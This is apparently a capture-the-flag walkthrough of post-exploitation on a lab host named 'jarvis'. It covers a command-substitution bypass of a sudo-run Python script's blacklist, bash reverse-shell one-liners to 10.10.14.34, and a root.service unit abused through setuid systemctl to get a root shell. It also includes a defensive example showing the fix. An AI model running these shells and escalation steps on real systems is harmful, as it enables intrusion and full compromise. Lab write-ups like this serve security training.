# Post Exploitation

## Privilege Escalation

Analyzing what commands we can run with sudo, we note the following:

```
www-data@jarvis:/var/www/Admin-Utilities$ sudo -l 
Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
www-data@jarvis:/var/www/Admin-Utilities$ 
```

We see that we can run simpler.py as pepper without a password. Analyzing that file we learn that it blacklists some shell metacharacters but does not filter the `$` character, so command substitution with `$(...)` still works. We can confirm the idea in our own shell first:

```
www-data@jarvis:/var/www/Admin-Utilities$ ping $(whoami)
ping: www-data: Temporary failure in name resolution
```

Whatever is inside `$(...)` is run by the shell first and its output is substituted into the command line before ping is executed. Since simpler.py hands our input to a shell in the same way, the same substitution happens as pepper when we call the script through sudo and feed it a payload at the prompt.
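To make the bypass concrete, here is an added Python example (not code from the walkthrough or from simpler.py itself) that models a substring blacklist of the kind the script uses, shows what `/bin/sh` makes of `ping $(...)`, and puts the hardened version beside it. The `FORBIDDEN` list and the `$(echo pwned)` payload are assumptions constructed for the demonstration; the page only establishes that `$` is not filtered.

```python
import ipaddress
import subprocess

# Assumed blacklist: a stand-in for the script's own check, not a copy of it.
# The page only tells us that '$' is not on it.
FORBIDDEN = ['&', ';', '-', '`', '||', '|']


def passes_blacklist(user_input: str) -> bool:
    """True if the input would get past a substring blacklist like FORBIDDEN."""
    return not any(bad in user_input for bad in FORBIDDEN)


def vulnerable_ping_command(user_input: str) -> str:
    """What a script doing os.system('ping ' + user_input) hands to /bin/sh."""
    return 'ping ' + user_input


def dry_run_expansion(command: str) -> str:
    """Let /bin/sh expand the command line but print it instead of running ping.

    Prefixing 'echo' keeps the $(...) substitution (that is the point) while
    the outer command becomes harmless, so we can see the expanded argv.
    """
    result = subprocess.run(['/bin/sh', '-c', 'echo ' + command],
                            capture_output=True, text=True, check=True)
    return result.stdout.strip()


def is_valid_target(target: str) -> bool:
    """Allow-list check: the prompt asks for an IP, so accept only an IP."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return False


def safe_ping_argv(target: str, count: int = 1) -> list:
    """Hardened version: validate the input as an IP address and build an argv
    list for subprocess.run(..., shell=False). No shell, so no expansion."""
    ip = ipaddress.ip_address(target)  # raises ValueError for '$(...)', hostnames, etc.
    return ['ping', '-c', str(count), str(ip)]


if __name__ == '__main__':
    payload = '$(echo pwned)'          # constructed payload, contains no forbidden substring
    print(passes_blacklist(payload))   # the blacklist never looks at '$', '(' or ')'
    print(dry_run_expansion(vulnerable_ping_command(payload)))
    print(safe_ping_argv('127.0.0.1'))
    print(is_valid_target(payload))
```

The two fixes that matter are the allow-list (`ipaddress.ip_address` accepts nothing but an address) and building an argv list for `subprocess.run` without `shell=True`; either one alone closes the `$(...)` hole, together they also stop any metacharacter the blacklist forgot.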

```
www-data@jarvis:/$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
```

![](/files/-MMNPLpGY4PF90D_PD0s)

From the shell we get as pepper, running the following (with a listener waiting on 10.10.14.34:4444) gave me a better shell:

```
bash -i >& /dev/tcp/10.10.14.34/4444 0>&1
```

![](/files/-MMNQoPLGg_6lK54PhpP)

Running LinEnum.sh, we learn the following:

![](/files/-MMNUEVYwtrUGxVohY8B)

The *systemctl* binary has the setuid bit set and is owned by root. We can use that to escalate to root privileges. If you're not sure how to do that, search the binary name on [GTFOBins](https://gtfobins.github.io/) and check how the SUID bit can be used to escalate privileges.

{% embed url="<https://gtfobins.github.io/gtfobins/systemctl/>" %}

### Steps to create a service

On our attacker machine, create a unit file named *root.service* with the following content (the IP and port are those of the listener we will start in a moment):

```
[Unit]
Description=get root privilege

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.34/9999 0>&1'

[Install]
WantedBy=multi-user.target
```

Copy it to the target machine (here into /home/pepper) and register it with the setuid systemctl, giving the absolute path to the file:

```
/bin/systemctl enable /home/pepper/root.service
```

Set up your listener on port 9999 and run the following to start the service. The unit name is the file name without the `.service` suffix, and because systemctl is SUID root the `ExecStart` command runs as root and connects back to us:

```
/bin/systemctl start root
```

![](/files/-MMNYSSGy6m-omavpbJF)
